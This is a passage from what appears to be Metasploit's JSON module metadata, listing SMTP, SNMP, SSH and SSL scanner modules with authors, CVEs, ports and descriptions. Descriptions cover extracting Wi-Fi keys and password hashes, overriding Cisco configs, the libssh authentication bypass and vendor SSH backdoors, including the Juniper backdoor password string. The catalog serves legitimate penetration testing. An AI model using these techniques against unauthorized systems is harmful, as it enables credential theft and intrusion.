"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_version.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/aix_version": {
"name": "AIX SNMP Scanner Auxiliary Module",
"full_name": "auxiliary/scanner/snmp/aix_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "AIX SNMP Scanner Auxiliary Module",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/aix_version.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/aix_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/arris_dg950": {
"name": "Arris DG950A Cable Modem Wifi Enumeration",
"full_name": "auxiliary/scanner/snmp/arris_dg950",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"Percent_X\" Heiland"
],
"description": "This module will extract WEP keys and WPA preshared keys from\n Arris DG950A cable modems.",
"references": [
"CVE-2014-4863",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-09 12:56:00 +0000",
"path": "/modules/auxiliary/scanner/snmp/arris_dg950.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/arris_dg950",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/brocade_enumhash": {
"name": "Brocade Password Hash Enumeration",
"full_name": "auxiliary/scanner/snmp/brocade_enumhash",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"PercentX\" Heiland"
],
"description": "This module extracts password hashes from certain Brocade load\n balancer devices.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/brocade_enumhash",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/cisco_config_tftp": {
"name": "Cisco IOS SNMP Configuration Grabber (TFTP)",
"full_name": "auxiliary/scanner/snmp/cisco_config_tftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>",
"hdm <x@hdm.io>"
],
"description": "This module will download the startup or running configuration\n from a Cisco IOS device using SNMP and TFTP. A read-write SNMP\n community is required. The SNMP community scanner module can\n assist in identifying a read-write community. The target must\n be able to connect back to the Metasploit system and the use of\n NAT will cause the TFTP transfer to fail.",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/cisco_config_tftp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/cisco_upload_file": {
"name": "Cisco IOS SNMP File Upload (TFTP)",
"full_name": "auxiliary/scanner/snmp/cisco_upload_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>",
"ct5595"
],
"description": "This module will copy file to a Cisco IOS device using SNMP and TFTP.\n The action Override_Config will override the running config of the Cisco device.\n A read-write SNMP community is required. The SNMP community scanner module can\n assist in identifying a read-write community. The target must\n be able to connect back to the Metasploit system and the use of\n NAT will cause the TFTP transfer to fail.",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-04-09 09:01:33 +0000",
"path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/cisco_upload_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/cnpilot_r_snmp_loot": {
"name": "Cambium cnPilot r200/r201 SNMP Enumeration",
"full_name": "auxiliary/scanner/snmp/cnpilot_r_snmp_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen"
],
"description": "Cambium cnPilot r200/r201 devices can be administered using SNMP. The\n device configuration contains IP addresses, keys, passwords, & lots of juicy\n information. This module exploits an access control flaw, which allows remotely\n extracting sensitive information such as account passwords, WiFI PSK, & SIP\n credentials via SNMP Read-Only (RO) community string.",
"references": [
"CVE-2017-5262",
"URL-https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-18 17:11:47 +0000",
"path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/cnpilot_r_snmp_loot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/epmp1000_snmp_loot": {
"name": "Cambium ePMP 1000 SNMP Enumeration",
"full_name": "auxiliary/scanner/snmp/epmp1000_snmp_loot",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen"
],
"description": "Cambium devices (ePMP, PMP, Force, & others) can be administered using\n SNMP. The device configuration contains IP addresses, keys, and passwords,\n amongst other information. This module uses SNMP to extract Cambium ePMP device\n configuration. On certain software versions, specific device configuration\n values can be accessed using SNMP RO string, even though only SNMP RW string\n should be able to access them, according to MIB documentation. The module also\n triggers full configuration backup, and retrieves the backup url. The\n configuration file can then be downloaded without authentication. The module\n has been tested on Cambium ePMP versions 3.5 & prior.",
"references": [
"URL-https://ipositivesecurity.com/2017/04/07/cambium-snmp-security-vulnerabilities/",
"CVE-2017-7918",
"CVE-2017-7922"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-12-18 17:03:13 +0000",
"path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/epmp1000_snmp_loot",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/netopia_enum": {
"name": "Netopia 3347 Cable Modem Wifi Enumeration",
"full_name": "auxiliary/scanner/snmp/netopia_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"PercentX\" Heiland"
],
"description": "This module extracts WEP keys and WPA preshared keys from\n certain Netopia cable modems.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/netopia_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/sbg6580_enum": {
"name": "ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module",
"full_name": "auxiliary/scanner/snmp/sbg6580_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matthew Kienow <mkienow@inokii.com>"
],
"description": "This module allows SNMP enumeration of the ARRIS / Motorola\n SURFboard SBG6580 Series Wi-Fi Cable Modem Gateway. It supports the username\n and password for the device user interface as well as wireless network keys\n and information.\n The default community used is \"public\".",
"references": [
"URL-https://seclists.org/fulldisclosure/2014/May/79",
"URL-http://www.arrisi.com/modems/datasheet/SBG6580/SBG6580_UserGuide.pdf",
"OSVDB-110555"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/sbg6580_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enum": {
"name": "SNMP Enumeration Module",
"full_name": "auxiliary/scanner/snmp/snmp_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module allows enumeration of any devices with SNMP\n protocol support. It supports hardware, software, and network information.\n The default community used is \"public\".",
"references": [
"URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol",
"URL-http://net-snmp.sourceforge.net/docs/man/snmpwalk.html",
"URL-http://www.nothink.org/perl/snmpcheck/"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enum_hp_laserjet": {
"name": "HP LaserJet Printer SNMP Enumeration",
"full_name": "auxiliary/scanner/snmp/snmp_enum_hp_laserjet",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module allows enumeration of files previously printed.\n It provides details as filename, client, timestamp and username information.\n The default community used is \"public\".",
"references": [
"URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol",
"URL-http://net-snmp.sourceforge.net/docs/man/snmpwalk.html",
"URL-http://www.nothink.org/perl/snmpcheck/",
"URL-http://www.securiteam.com/securitynews/5AP0S2KGVS.html",
"URL-http://stuff.mit.edu/afs/athena/dept/cron/tools/share/mibs/290923.mib"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enum_hp_laserjet",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enumshares": {
"name": "SNMP Windows SMB Share Enumeration",
"full_name": "auxiliary/scanner/snmp/snmp_enumshares",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enumshares",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_enumusers": {
"name": "SNMP Windows Username Enumeration",
"full_name": "auxiliary/scanner/snmp/snmp_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module will use LanManager/psProcessUsername OID values to\n enumerate local user accounts on a Windows/Solaris system via SNMP",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_login": {
"name": "SNMP Community Login Scanner",
"full_name": "auxiliary/scanner/snmp/snmp_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module logs in to SNMP devices using common community names.",
"references": [
"CVE-1999-0508"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/snmp_set": {
"name": "SNMP Set Module",
"full_name": "auxiliary/scanner/snmp/snmp_set",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module, similar to snmpset tool, uses the SNMP SET request\n to set information on a network entity. A OID (numeric notation)\n and a value are required. Target device must permit write access.",
"references": [
"URL-http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol",
"URL-http://www.net-snmp.org/docs/man/snmpset.html",
"URL-http://www.oid-info.com/"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/snmp_set.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/snmp_set",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/ubee_ddw3611": {
"name": "Ubee DDW3611b Cable Modem Wifi Enumeration",
"full_name": "auxiliary/scanner/snmp/ubee_ddw3611",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Deral \"PercentX\" Heiland"
],
"description": "This module will extract WEP keys and WPA preshared keys from\n certain Ubee cable modems.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string"
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/ubee_ddw3611",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/snmp/xerox_workcentre_enumusers": {
"name": "Xerox WorkCentre User Enumeration (SNMP)",
"full_name": "auxiliary/scanner/snmp/xerox_workcentre_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>"
],
"description": "This module will do user enumeration based on the Xerox WorkCentre present on the network.\n SNMP is used to extract the usernames.",
"references": [
],
"platform": "",
"arch": "",
"rport": 161,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/snmp/xerox_workcentre_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/apache_karaf_command_execution": {
"name": "Apache Karaf Default Credentials Command Execution",
"full_name": "auxiliary/scanner/ssh/apache_karaf_command_execution",
"rank": 300,
"disclosure_date": "2016-02-09",
"type": "auxiliary",
"author": [
"Nicholas Starke <nick@alephvoid.com>"
],
"description": "This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.\n The 'karaf' user has a known default password, which can be used to login to the\n SSH service, and execute operating system commands from remote.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 8101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 06:48:35 +0000",
"path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/apache_karaf_command_execution",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/ssh/cerberus_sftp_enumusers": {
"name": "Cerberus FTP Server SFTP Username Enumeration",
"full_name": "auxiliary/scanner/ssh/cerberus_sftp_enumusers",
"rank": 300,
"disclosure_date": "2014-05-27",
"type": "auxiliary",
"author": [
"Steve Embling",
"Matt Byrne <attackdebris@gmail.com>"
],
"description": "This module uses a dictionary to brute force valid usernames from\n Cerberus FTP server via SFTP. This issue affects all versions of\n the software older than 6.0.9.0 or 7.0.0.2 and is caused by a discrepancy\n in the way the SSH service handles failed logins for valid and invalid\n users. This issue was discovered by Steve Embling.",
"references": [
"URL-http://xforce.iss.net/xforce/xfdb/93546",
"BID-67707"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 06:48:35 +0000",
"path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/cerberus_sftp_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/detect_kippo": {
"name": "Kippo SSH Honeypot Detector",
"full_name": "auxiliary/scanner/ssh/detect_kippo",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Andrew Morris <andrew@morris.guru>"
],
"description": "This module will detect if an SSH server is running a Kippo honeypot.\n This is done by issuing unexpected data to the SSH service and checking\n the response returned for two particular non-standard error messages.",
"references": [
"URL-https://www.obscurechannel.com/x42/magicknumber.html",
"URL-http://morris.guru/detecting-kippo-ssh-honeypots/"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-03-26 15:43:10 +0000",
"path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/detect_kippo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/eaton_xpert_backdoor": {
"name": "Eaton Xpert Meter SSH Private Key Exposure Scanner",
"full_name": "auxiliary/scanner/ssh/eaton_xpert_backdoor",
"rank": 300,
"disclosure_date": "2018-07-18",
"type": "auxiliary",
"author": [
"BrianWGray"
],
"description": "Eaton Power Xpert Meters running firmware below version 12.x.x.x or\n below version 13.3.x.x ship with a public/private key pair that\n facilitate remote administrative access to the devices.\n Tested on: Firmware 12.1.9.1 and 13.3.2.10.",
"references": [
"CVE-2018-16158",
"EDB-45283",
"URL-http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf",
"URL-https://www.ctrlu.net/vuln/0006.html"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 15:47:18 +0000",
"path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/eaton_xpert_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/fortinet_backdoor": {
"name": "Fortinet SSH Backdoor Scanner",
"full_name": "auxiliary/scanner/ssh/fortinet_backdoor",
"rank": 300,
"disclosure_date": "2016-01-09",
"type": "auxiliary",
"author": [
"operator8203 <operator8203@runbox.com>",
"wvu <wvu@metasploit.com>"
],
"description": "This module scans for the Fortinet SSH backdoor.",
"references": [
"CVE-2016-1909",
"EDB-39224",
"PACKETSTORM-135225",
"URL-https://seclists.org/fulldisclosure/2016/Jan/26",
"URL-https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 15:36:32 +0000",
"path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/fortinet_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/juniper_backdoor": {
"name": "Juniper SSH Backdoor Scanner",
"full_name": "auxiliary/scanner/ssh/juniper_backdoor",
"rank": 300,
"disclosure_date": "2015-12-20",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"h00die <mike@stcyrsecurity.com>"
],
"description": "This module scans for the Juniper SSH backdoor (also valid on Telnet).\n Any username is required, and the password is <<< %s(un='%s') = %u.",
"references": [
"CVE-2015-7755",
"URL-https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor",
"URL-https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 06:48:35 +0000",
"path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/juniper_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/karaf_login": {
"name": "Apache Karaf Login Utility",
"full_name": "auxiliary/scanner/ssh/karaf_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Samuel Huckins",
"Brent Cook",
"Peer Aagaard",
"Greg Mikeska",
"Dev Mohanty"
],
"description": "This module attempts to log into Apache Karaf's SSH. If the TRYDEFAULTCRED option is\n set, then it will also try the default 'karaf' credential.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 15:47:18 +0000",
"path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/karaf_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/libssh_auth_bypass": {
"name": "libssh Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/ssh/libssh_auth_bypass",
"rank": 300,
"disclosure_date": "2018-10-16",
"type": "auxiliary",
"author": [
"Peter Winter-Smith",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an authentication bypass in libssh server code\n where a USERAUTH_SUCCESS message is sent in place of the expected\n USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and\n 0.8.0 through 0.8.3 are vulnerable.\n\n Note that this module's success depends on whether the server code\n can trigger the correct (shell/exec) callbacks despite only the state\n machine's authenticated state being set.\n\n Therefore, you may or may not get a shell if the server requires\n additional code paths to be followed.",
"references": [
"CVE-2018-10933",
"URL-https://www.libssh.org/security/advisories/CVE-2018-10933.txt"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 17:21:11 +0000",
"path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/libssh_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_enumusers": {
"name": "SSH Username Enumeration",
"full_name": "auxiliary/scanner/ssh/ssh_enumusers",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kenkeiras",
"Dariusz Tytko",
"Michal Sajdak",
"Qualys",
"wvu <wvu@metasploit.com>"
],
"description": "This module uses a malformed packet or timing attack to enumerate users on\n an OpenSSH server.\n\n The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST\n packet using public key authentication (must be enabled) to enumerate users.\n\n On some versions of OpenSSH under some configurations, OpenSSH will return a\n \"permission denied\" error for an invalid user faster than for a valid user,\n creating an opportunity for a timing attack to enumerate users.\n\n Testing note: invalid users were logged, while valid users were not. YMMV.",
"references": [
"CVE-2003-0190",
"CVE-2006-5229",
"CVE-2016-6210",
"CVE-2018-15473",
"OSVDB-32721",
"BID-20418",
"URL-https://seclists.org/oss-sec/2018/q3/124",
"URL-https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_enumusers",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_identify_pubkeys": {
"name": "SSH Public Key Acceptance Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_identify_pubkeys",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>",
"hdm <x@hdm.io>",
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module can determine what public keys are configured for\n key-based authentication across a range of machines, users, and\n sets of known keys. The SSH protocol indicates whether a particular\n key is accepted prior to the client performing the actual signed\n authentication request. To use this module, a text file containing\n one or more SSH keys should be provided. These can be private or\n public, so long as no passphrase is set on the private keys.\n\n If you have loaded a database plugin and connected to a database\n this module will record authorized public keys and hosts so you can\n track your process.\n\n Key files may be a single public (unencrypted) key, or several public\n keys concatenated together as an ASCII text file. Non-key data should be\n silently ignored. Private keys will only utilize the public key component\n stored within the key file.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-15 14:59:52 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_identify_pubkeys",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_login": {
"name": "SSH Login Check Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "This module will test ssh logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-12-12 13:38:58 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_login_pubkey": {
"name": "SSH Public Key Login Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_login_pubkey",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>",
"RageLtMan"
],
"description": "This module will test ssh logins on a range of machines using\n a defined private key file, and report successful logins.\n If you have loaded a database plugin and connected to a database\n this module will record successful logins and hosts so you can\n track your access.\n\n Key files may be a single private key, or several private keys in a single\n directory. Only a single passphrase is supported however, so it must either\n be shared between subject keys or only belong to a single one.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_login_pubkey",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssh/ssh_version": {
"name": "SSH Version Scanner",
"full_name": "auxiliary/scanner/ssh/ssh_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Daniel van Eeden <metasploit@myname.nl>"
],
"description": "Detect SSH Version.",
"references": [
"URL-http://en.wikipedia.org/wiki/SecureShell"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_version.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ssl/bleichenbacher_oracle": {
"name": "Scanner for Bleichenbacher Oracle in RSA PKCS #1 v1.5",
"full_name": "auxiliary/scanner/ssl/bleichenbacher_oracle",
"rank": 300,
"disclosure_date": "2009-06-17",
"type": "auxiliary",
"author": [
"Hanno Böck",
"Juraj Somorovsky",
"Craig Young",
"Daniel Bleichenbacher",
"Adam Cammack <adam_cammack[AT]rapid7.com>"
],
"description": "Some TLS implementations handle errors processing RSA key exchanges and\n encryption (PKCS #1 v1.5 messages) in a broken way that leads an\n adaptive chosen-chiphertext attack. Attackers cannot recover a server's\n private key, but they can decrypt and sign messages with it. A strong\n oracle occurs when the TLS server does not strictly check message\n formatting and needs less than a million requests on average to decode\n a given ciphertext. A weak oracle server strictly checks message\n formatting and often requires many more requests to perform the attack.\n\n This module requires Python 3 with the gmpy2 and cryptography packages\n to be present.",
"references": [
"CVE-2017-6168",
